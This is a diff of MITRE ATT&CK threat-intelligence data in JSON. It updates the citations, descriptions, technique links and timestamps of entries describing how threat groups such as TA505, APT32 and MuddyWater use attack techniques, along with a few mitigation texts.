+ "source_name": "Cybereason TA505 April 2019"
},
{
- "source_name": "ProofPoint SettingContent-ms July 2018",
+ "description": "Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat",
- "description": "Proofpoint Staff. (2018, July 19). TA505 Abusing SettingContent-ms within PDF files to Distribute FlawedAmmyy RAT. Retrieved April 19, 2019."
+ "source_name": "ProofPoint SettingContent-ms July 2018"
},
{
- "source_name": "Proofpoint TA505 Mar 2018",
+ "description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
- "description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019."
+ "source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to click links in emails and attachments. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used lures to get users to click links in emails and attachments. For example, [TA505](https://attack.mitre.org/groups/G0092) makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files. (Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)",
"relationship_type": "uses",
"id": "relationship--71ee0311-3fdc-4baf-8c3e-2143416b742c",
"type": "relationship",
- "modified": "2020-03-17T15:01:32.560Z",
+ "modified": "2020-05-29T20:09:49.528Z",
"created": "2020-03-17T15:01:32.560Z"
},
{
@@ -170798,13 +172135,18 @@
"url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses",
"description": "Counter Threat Unit Research Team. (2017, October 12). BRONZE BUTLER Targets Japanese Enterprises. Retrieved January 4, 2018.",
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
- "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)",
+ "description": "[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)",
"relationship_type": "uses",
"id": "relationship--529360d5-172a-4326-b993-e3af75d3e7af",
"type": "relationship",
- "modified": "2020-03-17T18:23:51.085Z",
+ "modified": "2020-06-24T01:27:32.169Z",
"created": "2020-03-17T18:23:51.085Z"
},
{
@@ -170855,7 +172197,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--4a2ce82e-1a74-468a-a6fb-bbead541383c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Talos Group123",
@@ -170867,7 +172209,7 @@
"relationship_type": "uses",
"id": "relationship--e7e7718a-b0e1-48cb-a9e8-bcbd0cf25cec",
"type": "relationship",
- "modified": "2020-03-20T15:54:09.709Z",
+ "modified": "2020-06-23T19:36:25.179Z",
"created": "2020-03-17T18:52:24.021Z"
},
{
@@ -170949,7 +172291,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "tool--aafea02e-ece5-4bb2-91a6-3bf8c7f38a39",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
"source_name": "Cobalt Strike TTPs Dec 2017",
@@ -170962,11 +172304,11 @@
"source_name": "CobaltStrike Daddy May 2017"
}
],
- "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA, [PowerSploit](https://attack.mitre.org/software/S0194), and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)",
+ "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)",
"relationship_type": "uses",
"id": "relationship--b3b5b384-feb1-43b1-8880-7b9ade558cf7",
"type": "relationship",
- "modified": "2020-03-20T15:42:14.664Z",
+ "modified": "2020-06-23T19:49:20.750Z",
"created": "2020-03-17T19:11:12.421Z"
},
{
@@ -171050,16 +172392,16 @@
"target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"external_references": [
{
- "source_name": "McAfee Honeybee",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "source_name": "McAfee Honeybee"
}
],
"description": "[Honeybee](https://attack.mitre.org/groups/G0072) embeds a Visual Basic script within a malicious Word document as part of initial access; the script is executed when the Word document is opened.(Citation: McAfee Honeybee)",
"relationship_type": "uses",
"id": "relationship--543c0cc3-3726-46ed-a839-e7268479127c",
"type": "relationship",
- "modified": "2020-03-17T19:20:54.067Z",
+ "modified": "2020-04-16T19:41:40.700Z",
"created": "2020-03-17T19:20:54.067Z"
},
{
@@ -171097,11 +172439,11 @@
"source_name": "FireEye APT32 May 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name.(Citation: FireEye APT32 May 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. [APT32](https://attack.mitre.org/groups/G0050) has also impersonated the legitimate Flash installer file name \"install_flashplayer.exe\".(Citation: FireEye APT32 May 2017)",
"relationship_type": "uses",
"id": "relationship--6f0b6cfd-ebe2-46f3-9be1-0075237dbcb9",
"type": "relationship",
- "modified": "2020-03-17T23:17:09.409Z",
+ "modified": "2020-06-26T17:02:14.327Z",
"created": "2020-03-17T23:17:09.409Z"
},
{
@@ -171396,14 +172738,14 @@
"source_name": "FireEye MuddyWater Mar 2018"
},
{
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/",
+ "source_name": "MuddyWater TrendMicro June 2018",
"description": "Villanueva, M., Co, M. (2018, June 14). Another Potential MuddyWater Campaign uses Powershell-based PRB-Backdoor. Retrieved July 3, 2018.",
- "source_name": "MuddyWater TrendMicro June 2018"
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/"
},
{
- "source_name": "Securelist MuddyWater Oct 2018",
+ "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
- "description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018."
+ "source_name": "Securelist MuddyWater Oct 2018"
},
{
"description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
@@ -171414,13 +172756,23 @@
"description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used VBScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)[(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used VBScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)",
"relationship_type": "uses",
"id": "relationship--4a0ee05d-f020-4811-bba6-56d12c15e275",
"type": "relationship",
- "modified": "2020-03-18T18:01:36.710Z",
+ "modified": "2020-05-29T01:24:37.322Z",
"created": "2020-03-18T18:01:36.710Z"
},
{
@@ -171429,7 +172781,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--705f0783-5f7d-4491-b6b7-9628e6e006d2",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "fsecure NanHaiShu July 2016",
@@ -171441,7 +172793,7 @@
"relationship_type": "uses",
"id": "relationship--2a94575a-8e47-4d69-964b-f96210a673bd",
"type": "relationship",
- "modified": "2020-03-18T18:14:53.814Z",
+ "modified": "2020-06-23T20:05:03.359Z",
"created": "2020-03-18T18:14:53.814Z"
},
{
@@ -171470,27 +172822,6 @@
"modified": "2020-03-18T18:37:06.748Z",
"created": "2020-03-18T18:37:06.748Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "malware--5c6ed2dc-37f4-40ea-b2e1-4c76140a388c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
- "external_references": [
- {
- "description": "Gorelik, M.. (2019, June 10). SECURITY ALERT: FIN8 IS BACK IN BUSINESS, TARGETING THE HOSPITALITY INDUSTRY. Retrieved June 13, 2019.",
- "url": "http://blog.morphisec.com/security-alert-fin8-is-back",
- "source_name": "Morphisec ShellTea June 2019"
- }
- ],
- "description": "[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used shellcode scripts.(Citation: Morphisec ShellTea June 2019)",
- "relationship_type": "uses",
- "id": "relationship--163c7849-cde3-4677-8ded-df69047e3a6d",
- "type": "relationship",
- "modified": "2020-03-18T18:52:40.972Z",
- "created": "2020-03-18T18:52:40.972Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -171526,11 +172857,11 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users and DC servers using the commands net localgroup administrators and net group \"Domain Controllers\" /domain.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users using the commands net localgroup administrators.(Citation: Cybereason Cobalt Kitty 2017)",
"relationship_type": "uses",
"id": "relationship--5d45479d-7cc2-49cc-8f10-5ead0a1db033",
"type": "relationship",
- "modified": "2020-03-18T19:33:54.619Z",
+ "modified": "2020-06-29T17:03:09.817Z",
"created": "2020-03-18T19:33:54.619Z"
},
{
@@ -171961,7 +173292,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--d13c8a7f-740b-4efa-a232-de7d6bb05321",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.",
@@ -171973,7 +173304,7 @@
"relationship_type": "uses",
"id": "relationship--60989b47-4725-4077-8aed-fb5f990fda22",
"type": "relationship",
- "modified": "2020-03-19T16:21:36.690Z",
+ "modified": "2020-06-23T20:30:07.122Z",
"created": "2020-03-19T16:21:36.690Z"
},
{
@@ -171988,13 +173319,18 @@
"description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.",
"url": "https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/",
"source_name": "Cyber Forensicator Silence Jan 2019"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell scripts.(Citation: Cyber Forensicator Silence Jan 2019)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell to download and execute payloads.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--afafd676-1b44-44ae-ad9a-930c0df348bc",
"type": "relationship",
- "modified": "2020-03-19T16:21:36.705Z",
+ "modified": "2020-05-06T03:12:02.501Z",
"created": "2020-03-19T16:21:36.705Z"
},
{
@@ -172024,7 +173360,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "Proofpoint TA505 Sep 2017",
@@ -172041,7 +173377,7 @@
"relationship_type": "uses",
"id": "relationship--6f57b4eb-ba87-4755-9b96-3715e1da1de1",
"type": "relationship",
- "modified": "2020-03-19T17:35:11.637Z",
+ "modified": "2020-06-23T20:39:02.965Z",
"created": "2020-03-19T17:35:11.637Z"
},
{
@@ -172050,7 +173386,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--6a92d80f-cc65-45f6-aa66-3cdea6786b3c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "Unit42 Xbash Sept 2018",
@@ -172062,7 +173398,7 @@
"relationship_type": "uses",
"id": "relationship--8dd45f3b-a005-40b3-a6ef-c1ef208e8504",
"type": "relationship",
- "modified": "2020-03-19T17:44:44.695Z",
+ "modified": "2020-06-23T20:41:28.698Z",
"created": "2020-03-19T17:44:44.695Z"
},
{
@@ -172125,27 +173461,6 @@
"modified": "2020-03-19T19:09:17.746Z",
"created": "2020-03-19T19:09:17.746Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "malware--b00f90b6-c75c-4bfd-b813-ca9e6c9ebf29",
- "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "external_references": [
- {
- "source_name": "TrendMicro MacOS April 2018",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/",
- "description": "Horejsi, J. (2018, April 04). New MacOS Backdoor Linked to OceanLotus Found. Retrieved November 13, 2018."
- }
- ],
- "description": "[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses VBS scripts.(Citation: TrendMicro MacOS April 2018)",
- "relationship_type": "uses",
- "id": "relationship--f26ce7ef-2691-44e5-80ca-175308cf5164",
- "type": "relationship",
- "modified": "2020-03-19T19:09:17.750Z",
- "created": "2020-03-19T19:09:17.750Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -172157,7 +173472,7 @@
"description": "Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.",
"id": "relationship--73b3f761-2c2d-4ceb-8886-dd0bb0fc7fc4",
"type": "relationship",
- "modified": "2020-03-19T19:20:39.415Z",
+ "modified": "2020-07-09T14:43:42.680Z",
"created": "2020-03-19T19:09:30.512Z"
},
{
@@ -172178,7 +173493,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-19T19:20:39.422Z",
+ "modified": "2020-07-09T14:43:42.696Z",
"created": "2020-03-19T19:09:30.514Z"
},
{
@@ -172199,7 +173514,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-19T19:20:39.487Z",
+ "modified": "2020-07-09T14:43:42.682Z",
"created": "2020-03-19T19:09:30.515Z"
},
{
@@ -172221,7 +173536,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"source_name": "ClearSky MuddyWater Nov 2018",
@@ -172233,7 +173548,7 @@
"relationship_type": "uses",
"id": "relationship--cb36459a-d37c-424f-8130-55cf8d29417e",
"type": "relationship",
- "modified": "2020-03-19T19:11:23.708Z",
+ "modified": "2020-06-23T20:16:29.296Z",
"created": "2020-03-19T19:11:23.708Z"
},
{
@@ -172267,7 +173582,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T19:47:39.153Z",
+ "modified": "2020-06-20T19:57:36.323Z",
"created": "2020-03-19T19:17:21.370Z"
},
{
@@ -172584,7 +173899,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0",
+ "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580",
"external_references": [
{
"source_name": "Cybereason Oceanlotus May 2017",
@@ -172597,11 +173912,11 @@
"url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials stored in Windows registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"relationship_type": "uses",
"id": "relationship--304f5c1b-7cfa-4c2a-b7a2-e4957da603b1",
"type": "relationship",
- "modified": "2020-03-19T22:10:50.454Z",
+ "modified": "2020-06-19T21:36:32.167Z",
"created": "2020-03-19T22:10:50.454Z"
},
{
@@ -172992,7 +174307,7 @@
"relationship_type": "uses",
"id": "relationship--7ac04e64-a09e-4a66-b6ce-047030400045",
"type": "relationship",
- "modified": "2020-03-19T22:47:20.671Z",
+ "modified": "2020-07-15T13:03:46.804Z",
"created": "2020-03-19T22:47:20.671Z"
},
{
@@ -174188,7 +175503,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--efece7e8-e40b-49c2-9f84-c55c5c93d05c",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"description": "Kamluk, V. & Gostev, A. (2016, February). Adwind - A Cross-Platform RAT. Retrieved April 23, 2019.",
@@ -174200,7 +175515,7 @@
"relationship_type": "uses",
"id": "relationship--a28ed204-7e5c-4090-a0c5-0a056ef602fe",
"type": "relationship",
- "modified": "2020-03-20T17:30:56.763Z",
+ "modified": "2020-06-23T19:55:50.241Z",
"created": "2020-03-20T02:17:36.884Z"
},
{
@@ -174212,21 +175527,21 @@
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"external_references": [
{
- "source_name": "McAfee Honeybee",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "source_name": "McAfee Honeybee"
},
{
- "source_name": "McAfee Honeybee",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/"
+ "source_name": "McAfee Honeybee"
}
],
"description": "Several commands are supported by the [Honeybee](https://attack.mitre.org/groups/G0072)'s implant via the command-line interface and there\u2019s also a utility to execute any custom command on an infected endpoint.(Citation: McAfee Honeybee) [Honeybee](https://attack.mitre.org/groups/G0072) used batch scripting.(Citation: McAfee Honeybee)",
"relationship_type": "uses",
"id": "relationship--58e2393f-06b5-44a6-a2ad-9b9980dd57ab",
"type": "relationship",
- "modified": "2020-03-20T17:26:29.311Z",
+ "modified": "2020-04-16T19:41:40.715Z",
"created": "2020-03-20T02:31:08.790Z"
},
{
@@ -174747,16 +176062,26 @@
"target_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7",
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "CheckPoint Redaman October 2019",
+ "url": "https://research.checkpoint.com/2019/ponys-cc-servers-hidden-inside-the-bitcoin-blockchain/",
+ "description": "Eisenkraft, K., Olshtein, A. (2019, October 17). Pony\u2019s C&C servers hidden inside the Bitcoin blockchain. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
- "description": "[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) has used an RSS feed on Livejournal to update a list of encrypted C2 server names. [RTM](https://attack.mitre.org/software/S0148) has also hidden [Pony](https://attack.mitre.org/software/S0453) C2 server IP addresses within transactions on the Bitcoin and Namecoin blockchain.(Citation: ESET RTM Feb 2017)(Citation: CheckPoint Redaman October 2019)(Citation: Unit42 Redaman January 2019)",
"relationship_type": "uses",
"id": "relationship--954c6284-d1eb-48f1-96a4-1ed81b063d82",
"type": "relationship",
- "modified": "2020-03-20T21:28:53.091Z",
+ "modified": "2020-06-16T20:51:14.301Z",
"created": "2020-03-20T21:28:53.091Z"
},
{
@@ -175213,7 +176538,7 @@
"description": "Ensure Domain Controller backups are properly secured.",
"id": "relationship--3e3f06c4-3105-4d07-b876-702005e9b59a",
"type": "relationship",
- "modified": "2020-03-25T16:25:17.386Z",
+ "modified": "2020-06-09T20:44:40.885Z",
"created": "2020-03-25T16:25:17.386Z"
},
{
@@ -175384,19 +176709,6 @@
"modified": "2020-03-31T13:11:10.795Z",
"created": "2020-03-25T22:32:16.738Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--25d5e1d8-c6fb-4735-bc57-115a21222f4b",
- "target_ref": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830",
- "relationship_type": "mitigates",
- "id": "relationship--fbf9bc94-2a79-4bf2-ab1e-0bd064b0bb59",
- "type": "relationship",
- "modified": "2020-03-26T15:44:27.575Z",
- "created": "2020-03-26T15:44:27.575Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -175420,7 +176732,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T20:07:01.037Z",
+ "modified": "2020-06-20T21:53:08.374Z",
"created": "2020-03-26T15:53:25.125Z"
},
{
@@ -175431,10 +176743,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6",
"relationship_type": "mitigates",
- "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application whitelisting solutions also capable of blocking libraries loaded by legitimate software.",
+ "description": "Adversaries may use new payloads to execute this technique. Identify and block potentially malicious software executed through hijacking by using application control solutions also capable of blocking libraries loaded by legitimate software.",
"id": "relationship--6fa01dcb-e06c-4f8b-b6a2-c301f0198df4",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.040Z",
+ "modified": "2020-06-20T21:53:08.371Z",
"created": "2020-03-26T15:53:25.140Z"
},
{
@@ -175470,7 +176782,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-26T20:07:01.083Z",
+ "modified": "2020-06-20T21:53:08.417Z",
"created": "2020-03-26T15:53:25.148Z"
},
{
@@ -175484,7 +176796,7 @@
"description": "Update software regularly to include patches that fix DLL side-loading vulnerabilities.",
"id": "relationship--62c9a1c7-557e-433b-b422-3427a308f34e",
"type": "relationship",
- "modified": "2020-03-26T20:07:01.092Z",
+ "modified": "2020-06-20T21:53:08.422Z",
"created": "2020-03-26T16:17:09.647Z"
},
{
@@ -175498,7 +176810,7 @@
